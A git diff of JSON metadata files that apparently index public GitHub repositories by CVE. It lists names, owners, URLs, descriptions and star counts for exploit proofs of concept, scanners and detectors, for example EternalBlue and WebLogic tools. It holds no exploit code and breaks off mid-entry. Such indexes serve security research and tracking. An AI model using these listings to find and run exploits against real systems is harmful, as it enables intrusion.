diff --git a/2001/CVE-2001-1473.json b/2001/CVE-2001-1473.json index 79d574aae1..5d51d25181 100644 --- a/2001/CVE-2001-1473.json +++ b/2001/CVE-2001-1473.json @@ -14,10 +14,10 @@ "description": "poc-CVE-2001-1473", "fork": false, "created_at": "2024-11-13T18:37:18Z", - "updated_at": "2024-11-13T21:13:49Z", + "updated_at": "2024-11-28T15:01:34Z", "pushed_at": "2024-11-13T18:54:18Z", - "stargazers_count": 1, - "watchers_count": 1, + "stargazers_count": 0, + "watchers_count": 0, "has_discussions": false, "forks_count": 1, "allow_forking": true, @@ -33,7 +33,7 @@ ], "visibility": "public", "forks": 1, - "watchers": 1, + "watchers": 0, "score": 0, "subscribers_count": 1 } diff --git a/2014/CVE-2014-4210.json b/2014/CVE-2014-4210.json index e2522164a6..e9c8722ad4 100644 --- a/2014/CVE-2014-4210.json +++ b/2014/CVE-2014-4210.json @@ -45,10 +45,10 @@ "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", "fork": false, "created_at": "2020-01-15T04:26:29Z", - "updated_at": "2024-11-28T09:29:20Z", + "updated_at": "2024-11-28T15:07:29Z", "pushed_at": "2023-11-24T09:21:56Z", - "stargazers_count": 2013, - "watchers_count": 2013, + "stargazers_count": 2014, + "watchers_count": 2014, "has_discussions": true, "forks_count": 339, "allow_forking": true, @@ -78,7 +78,7 @@ ], "visibility": "public", "forks": 339, - "watchers": 2013, + "watchers": 2014, "score": 0, "subscribers_count": 37 }, diff --git a/2016/CVE-2016-0638.json b/2016/CVE-2016-0638.json index 1ee57dd30c..2c2cfceaeb 100644 --- a/2016/CVE-2016-0638.json +++ b/2016/CVE-2016-0638.json @@ -14,10 +14,10 @@ "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", "fork": false, "created_at": "2020-01-15T04:26:29Z", - "updated_at": "2024-11-28T09:29:20Z", + "updated_at": "2024-11-28T15:07:29Z", "pushed_at": "2023-11-24T09:21:56Z", - "stargazers_count": 2013, - "watchers_count": 2013, + "stargazers_count": 2014, + "watchers_count": 2014, "has_discussions": true, "forks_count": 339, "allow_forking": true, @@ -47,7 +47,7 @@ ], "visibility": "public", "forks": 339, - "watchers": 2013, + "watchers": 2014, "score": 0, "subscribers_count": 37 }, diff --git a/2017/CVE-2017-0005.json b/2017/CVE-2017-0005.json new file mode 100644 index 0000000000..f8e871b898 --- /dev/null +++ b/2017/CVE-2017-0005.json @@ -0,0 +1,33 @@ +[ + { + "id": 219656365, + "name": "0005poc", + "full_name": "sheri31\/0005poc", + "owner": { + "login": "sheri31", + "id": 22992048, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22992048?v=4", + "html_url": "https:\/\/github.com\/sheri31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sheri31\/0005poc", + "description": "CVE-2017-0005 POC", + "fork": false, + "created_at": "2019-11-05T04:18:08Z", + "updated_at": "2021-12-31T06:23:54Z", + "pushed_at": "2019-11-05T04:21:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0037.json b/2017/CVE-2017-0037.json new file mode 100644 index 0000000000..46c3cd3d88 --- /dev/null +++ b/2017/CVE-2017-0037.json @@ -0,0 +1,33 @@ +[ + { + "id": 474803763, + "name": "CVE-2017-0037", + "full_name": "chattopadhyaykittu\/CVE-2017-0037", + "owner": { + "login": "chattopadhyaykittu", + "id": 26525131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26525131?v=4", + "html_url": "https:\/\/github.com\/chattopadhyaykittu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chattopadhyaykittu\/CVE-2017-0037", + "description": null, + "fork": false, + "created_at": "2022-03-28T01:19:58Z", + "updated_at": "2022-03-28T01:19:58Z", + "pushed_at": "2022-03-28T01:47:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0038.json b/2017/CVE-2017-0038.json new file mode 100644 index 0000000000..9fb7e18d1a --- /dev/null +++ b/2017/CVE-2017-0038.json @@ -0,0 +1,33 @@ +[ + { + "id": 85834314, + "name": "CVE-2017-0038-EXP-C-JS", + "full_name": "k0keoyo\/CVE-2017-0038-EXP-C-JS", + "owner": { + "login": "k0keoyo", + "id": 13257929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13257929?v=4", + "html_url": "https:\/\/github.com\/k0keoyo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k0keoyo\/CVE-2017-0038-EXP-C-JS", + "description": null, + "fork": false, + "created_at": "2017-03-22T13:59:48Z", + "updated_at": "2019-09-13T11:40:59Z", + "pushed_at": "2017-03-23T14:07:37Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0055.json b/2017/CVE-2017-0055.json new file mode 100644 index 0000000000..54c59d9555 --- /dev/null +++ b/2017/CVE-2017-0055.json @@ -0,0 +1,33 @@ +[ + { + "id": 589762883, + "name": "CVE-2017-0055-PoC", + "full_name": "NetJBS\/CVE-2017-0055-PoC", + "owner": { + "login": "NetJBS", + "id": 100053595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100053595?v=4", + "html_url": "https:\/\/github.com\/NetJBS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NetJBS\/CVE-2017-0055-PoC", + "description": "This it's a PoC of Departament of justice VDP. By rootkit", + "fork": false, + "created_at": "2023-01-16T21:55:56Z", + "updated_at": "2023-01-16T21:55:56Z", + "pushed_at": "2023-01-16T21:56:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0065.json b/2017/CVE-2017-0065.json new file mode 100644 index 0000000000..048339f11c --- /dev/null +++ b/2017/CVE-2017-0065.json @@ -0,0 +1,39 @@ +[ + { + "id": 85072866, + "name": "cve-2017-0065", + "full_name": "Dankirk\/cve-2017-0065", + "owner": { + "login": "Dankirk", + "id": 10588760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10588760?v=4", + "html_url": "https:\/\/github.com\/Dankirk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dankirk\/cve-2017-0065", + "description": "Exploiting Edge's read:\/\/ urlhandler", + "fork": false, + "created_at": "2017-03-15T13:01:29Z", + "updated_at": "2021-10-23T14:56:32Z", + "pushed_at": "2021-10-23T14:56:30Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "edge", + "exploit", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 14, + "watchers": 15, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0075.json b/2017/CVE-2017-0075.json new file mode 100644 index 0000000000..ba15985b9a --- /dev/null +++ b/2017/CVE-2017-0075.json @@ -0,0 +1,95 @@ +[ + { + "id": 207950188, + "name": "HyperV", + "full_name": "4B5F5F4B\/HyperV", + "owner": { + "login": "4B5F5F4B", + "id": 19218802, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19218802?v=4", + "html_url": "https:\/\/github.com\/4B5F5F4B", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4B5F5F4B\/HyperV", + "description": "PoC for CVE-2017-0075", + "fork": false, + "created_at": "2019-09-12T02:45:07Z", + "updated_at": "2024-07-22T02:02:25Z", + "pushed_at": "2019-09-12T03:02:13Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 36, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 471700783, + "name": "4B5F5F4Bp", + "full_name": "belyakovvitagmailt\/4B5F5F4Bp", + "owner": { + "login": "belyakovvitagmailt", + "id": 101933630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101933630?v=4", + "html_url": "https:\/\/github.com\/belyakovvitagmailt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/belyakovvitagmailt\/4B5F5F4Bp", + "description": "PoC for CVE-2017-0075", + "fork": false, + "created_at": "2022-03-19T13:18:12Z", + "updated_at": "2022-03-19T13:18:12Z", + "pushed_at": "2022-03-19T13:18:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 481437326, + "name": "4B5F5F4Bp", + "full_name": "MarkusCarelli1\/4B5F5F4Bp", + "owner": { + "login": "MarkusCarelli1", + "id": 103617184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103617184?v=4", + "html_url": "https:\/\/github.com\/MarkusCarelli1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarkusCarelli1\/4B5F5F4Bp", + "description": "PoC for CVE-2017-0075", + "fork": false, + "created_at": "2022-04-14T02:16:31Z", + "updated_at": "2022-04-14T02:16:31Z", + "pushed_at": "2022-04-14T02:16:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0089.json b/2017/CVE-2017-0089.json new file mode 100644 index 0000000000..23f65712d7 --- /dev/null +++ b/2017/CVE-2017-0089.json @@ -0,0 +1,33 @@ +[ + { + "id": 754437399, + "name": "Added-Pentest-Ground-to-vulnerable-websites-for-training", + "full_name": "rainhawk13\/Added-Pentest-Ground-to-vulnerable-websites-for-training", + "owner": { + "login": "rainhawk13", + "id": 133608975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133608975?v=4", + "html_url": "https:\/\/github.com\/rainhawk13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rainhawk13\/Added-Pentest-Ground-to-vulnerable-websites-for-training", + "description": "CVE-2017-0089 Learn more at National Vulnerability Database (NVD) • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information", + "fork": false, + "created_at": "2024-02-08T03:33:56Z", + "updated_at": "2024-02-13T00:03:41Z", + "pushed_at": "2024-02-13T00:10:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0100.json b/2017/CVE-2017-0100.json new file mode 100644 index 0000000000..35c4865ce7 --- /dev/null +++ b/2017/CVE-2017-0100.json @@ -0,0 +1,35 @@ +[ + { + "id": 351017666, + "name": "CVE-2017-0100", + "full_name": "cssxn\/CVE-2017-0100", + "owner": { + "login": "cssxn", + "id": 11917920, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11917920?v=4", + "html_url": "https:\/\/github.com\/cssxn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cssxn\/CVE-2017-0100", + "description": "CVE-2017-0100、MS17-012、Eop", + "fork": false, + "created_at": "2021-03-24T09:21:09Z", + "updated_at": "2024-11-27T09:16:12Z", + "pushed_at": "2021-03-24T09:39:17Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit" + ], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0106.json b/2017/CVE-2017-0106.json new file mode 100644 index 0000000000..e5d6a00f79 --- /dev/null +++ b/2017/CVE-2017-0106.json @@ -0,0 +1,33 @@ +[ + { + "id": 88117539, + "name": "CVE-2017-0106", + "full_name": "ryhanson\/CVE-2017-0106", + "owner": { + "login": "ryhanson", + "id": 3486433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3486433?v=4", + "html_url": "https:\/\/github.com\/ryhanson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ryhanson\/CVE-2017-0106", + "description": null, + "fork": false, + "created_at": "2017-04-13T02:42:08Z", + "updated_at": "2017-04-13T02:42:08Z", + "pushed_at": "2017-04-13T02:42:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0108.json b/2017/CVE-2017-0108.json new file mode 100644 index 0000000000..b1d0f5ef01 --- /dev/null +++ b/2017/CVE-2017-0108.json @@ -0,0 +1,33 @@ +[ + { + "id": 88317204, + "name": "CVE-2017-0108", + "full_name": "homjxi0e\/CVE-2017-0108", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-0108", + "description": null, + "fork": false, + "created_at": "2017-04-15T02:10:16Z", + "updated_at": "2017-12-04T20:08:18Z", + "pushed_at": "2017-04-15T02:16:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0143.json b/2017/CVE-2017-0143.json new file mode 100644 index 0000000000..f6cac50a60 --- /dev/null +++ b/2017/CVE-2017-0143.json @@ -0,0 +1,126 @@ +[ + { + "id": 91496993, + "name": "wannafind", + "full_name": "valarauco\/wannafind", + "owner": { + "login": "valarauco", + "id": 434898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/434898?v=4", + "html_url": "https:\/\/github.com\/valarauco", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/valarauco\/wannafind", + "description": "Simple script using nmap to detect CVE-2017-0143 MS17-010 in your network", + "fork": false, + "created_at": "2017-05-16T19:34:38Z", + "updated_at": "2024-03-15T16:18:05Z", + "pushed_at": "2017-05-26T17:28:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 301944849, + "name": "Etern-blue-Windows-7-Checker", + "full_name": "NatteeSetobol\/Etern-blue-Windows-7-Checker", + "owner": { + "login": "NatteeSetobol", + "id": 6789925, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6789925?v=4", + "html_url": "https:\/\/github.com\/NatteeSetobol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NatteeSetobol\/Etern-blue-Windows-7-Checker", + "description": "EternalBlue is a well-known SMB exploit created by the NSA to attack various versions of Windows, including Windows 7. Etern-Blue-Windows-7-Checker will basically send SMB packets to a host to see if that Windows host machine is vulnerable to the EternalBlue exploit (CVE-2017-0143).", + "fork": false, + "created_at": "2020-10-07T06:19:45Z", + "updated_at": "2024-08-02T11:22:46Z", + "pushed_at": "2023-04-05T03:11:37Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 384203070, + "name": "MS17-010_CVE-2017-0143", + "full_name": "n3rdh4x0r\/MS17-010_CVE-2017-0143", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/MS17-010_CVE-2017-0143", + "description": "MS17-010_CVE-2017-0143", + "fork": false, + "created_at": "2021-07-08T17:35:50Z", + "updated_at": "2024-11-18T19:03:23Z", + "pushed_at": "2024-11-18T19:03:19Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 38, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 492143666, + "name": "Metasploit-Attack-Report", + "full_name": "SampatDhakal\/Metasploit-Attack-Report", + "owner": { + "login": "SampatDhakal", + "id": 48426525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48426525?v=4", + "html_url": "https:\/\/github.com\/SampatDhakal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SampatDhakal\/Metasploit-Attack-Report", + "description": "Technical Analysis of the SMB vulnerability (CVE-2017-0143) & its impact on the vulnerable system", + "fork": false, + "created_at": "2022-05-14T07:26:31Z", + "updated_at": "2022-05-14T07:26:31Z", + "pushed_at": "2022-05-14T07:31:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0144.json b/2017/CVE-2017-0144.json new file mode 100644 index 0000000000..3b07b1afa7 --- /dev/null +++ b/2017/CVE-2017-0144.json @@ -0,0 +1,219 @@ +[ + { + "id": 97406900, + "name": "eternal_scanner", + "full_name": "peterpt\/eternal_scanner", + "owner": { + "login": "peterpt", + "id": 7487321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7487321?v=4", + "html_url": "https:\/\/github.com\/peterpt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/peterpt\/eternal_scanner", + "description": "An internet scanner for exploit CVE-2017-0144 (Eternal Blue) & CVE-2017-0145 (Eternal Romance)", + "fork": false, + "created_at": "2017-07-16T19:44:04Z", + "updated_at": "2024-11-13T00:06:38Z", + "pushed_at": "2024-07-31T13:54:45Z", + "stargazers_count": 323, + "watchers_count": 323, + "has_discussions": false, + "forks_count": 105, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 105, + "watchers": 323, + "score": 0, + "subscribers_count": 22 + }, + { + "id": 189801410, + "name": "eternalblue", + "full_name": "kimocoder\/eternalblue", + "owner": { + "login": "kimocoder", + "id": 4252297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4252297?v=4", + "html_url": "https:\/\/github.com\/kimocoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kimocoder\/eternalblue", + "description": "CVE-2017-0144", + "fork": false, + "created_at": "2019-06-02T03:41:47Z", + "updated_at": "2023-12-18T09:38:13Z", + "pushed_at": "2024-04-01T12:00:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 350284554, + "name": "CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution", + "full_name": "EEsshq\/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution", + "owner": { + "login": "EEsshq", + "id": 78906046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78906046?v=4", + "html_url": "https:\/\/github.com\/EEsshq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EEsshq\/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution", + "description": null, + "fork": false, + "created_at": "2021-03-22T09:33:51Z", + "updated_at": "2024-10-31T15:26:13Z", + "pushed_at": "2021-03-22T10:46:07Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 578982031, + "name": "Detect-CVE-2017-0144-attack", + "full_name": "quynhold\/Detect-CVE-2017-0144-attack", + "owner": { + "login": "quynhold", + "id": 71933499, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71933499?v=4", + "html_url": "https:\/\/github.com\/quynhold", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/quynhold\/Detect-CVE-2017-0144-attack", + "description": "Chương trình theo dõi, giám sát lưu lượng mạng được viết bằng Python, nó sẽ đưa ra cảnh báo khi phát hiện tấn công CVE-2017-0144", + "fork": false, + "created_at": "2022-12-16T11:10:13Z", + "updated_at": "2022-12-16T11:57:41Z", + "pushed_at": "2022-12-23T02:19:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781339379, + "name": "Vulnerability-Research-CVE-2017-0144", + "full_name": "ducanh2oo3\/Vulnerability-Research-CVE-2017-0144", + "owner": { + "login": "ducanh2oo3", + "id": 143213966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143213966?v=4", + "html_url": "https:\/\/github.com\/ducanh2oo3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ducanh2oo3\/Vulnerability-Research-CVE-2017-0144", + "description": "LAB: TẤN CÔNG HỆ ĐIỀU HÀNH WINDOWS DỰA VÀO LỖ HỔNG GIAO THỨC SMB.", + "fork": false, + "created_at": "2024-04-03T07:39:43Z", + "updated_at": "2024-04-03T07:39:43Z", + "pushed_at": "2024-04-03T08:05:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823495260, + "name": "CVE-Research", + "full_name": "AnugiArrawwala\/CVE-Research", + "owner": { + "login": "AnugiArrawwala", + "id": 141626082, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141626082?v=4", + "html_url": "https:\/\/github.com\/AnugiArrawwala", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AnugiArrawwala\/CVE-Research", + "description": "CVE-2017-0144 (Eternal Blue) | CVE-2023-3881 | CVE-2011-2523", + "fork": false, + "created_at": "2024-07-03T06:30:54Z", + "updated_at": "2024-07-03T06:52:39Z", + "pushed_at": "2024-07-03T06:52:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855638605, + "name": "CVE-Exploitation-Reports", + "full_name": "DenuwanJayasekara\/CVE-Exploitation-Reports", + "owner": { + "login": "DenuwanJayasekara", + "id": 181200406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181200406?v=4", + "html_url": "https:\/\/github.com\/DenuwanJayasekara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DenuwanJayasekara\/CVE-Exploitation-Reports", + "description": "CVE Exploitation Reports: CVE-2007-3280, CVE-2017-0144, CVE-2019-0708", + "fork": false, + "created_at": "2024-09-11T07:56:20Z", + "updated_at": "2024-09-11T08:11:15Z", + "pushed_at": "2024-09-11T08:10:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0145.json b/2017/CVE-2017-0145.json new file mode 100644 index 0000000000..cf39e22f42 --- /dev/null +++ b/2017/CVE-2017-0145.json @@ -0,0 +1,33 @@ +[ + { + "id": 91811261, + "name": "chef_tissues", + "full_name": "MelonSmasher\/chef_tissues", + "owner": { + "login": "MelonSmasher", + "id": 1491053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1491053?v=4", + "html_url": "https:\/\/github.com\/MelonSmasher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MelonSmasher\/chef_tissues", + "description": "Install patch for CVE-2017-0145 AKA WannaCry.", + "fork": false, + "created_at": "2017-05-19T13:55:06Z", + "updated_at": "2018-04-04T01:07:21Z", + "pushed_at": "2017-05-19T16:49:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0147.json b/2017/CVE-2017-0147.json new file mode 100644 index 0000000000..11d949ed22 --- /dev/null +++ b/2017/CVE-2017-0147.json @@ -0,0 +1,33 @@ +[ + { + "id": 444376167, + "name": "Exploit-Win32.CVE-2017-0147.A", + "full_name": "RobertoLeonFR-ES\/Exploit-Win32.CVE-2017-0147.A", + "owner": { + "login": "RobertoLeonFR-ES", + "id": 93054044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93054044?v=4", + "html_url": "https:\/\/github.com\/RobertoLeonFR-ES", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RobertoLeonFR-ES\/Exploit-Win32.CVE-2017-0147.A", + "description": "the name of virus is the detection of microsoft defender, is the tipic antivirus", + "fork": false, + "created_at": "2022-01-04T10:25:39Z", + "updated_at": "2022-01-04T10:26:40Z", + "pushed_at": "2022-01-04T10:26:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0148.json b/2017/CVE-2017-0148.json new file mode 100644 index 0000000000..d188c05935 --- /dev/null +++ b/2017/CVE-2017-0148.json @@ -0,0 +1,33 @@ +[ + { + "id": 667867330, + "name": "CVE-2017-0148", + "full_name": "HakaKali\/CVE-2017-0148", + "owner": { + "login": "HakaKali", + "id": 69049445, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69049445?v=4", + "html_url": "https:\/\/github.com\/HakaKali", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HakaKali\/CVE-2017-0148", + "description": null, + "fork": false, + "created_at": "2023-07-18T13:32:17Z", + "updated_at": "2023-07-18T13:41:12Z", + "pushed_at": "2023-07-18T14:06:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0199.json b/2017/CVE-2017-0199.json new file mode 100644 index 0000000000..907cd9b974 --- /dev/null +++ b/2017/CVE-2017-0199.json @@ -0,0 +1,723 @@ +[ + { + "id": 88117490, + "name": "CVE-2017-0199", + "full_name": 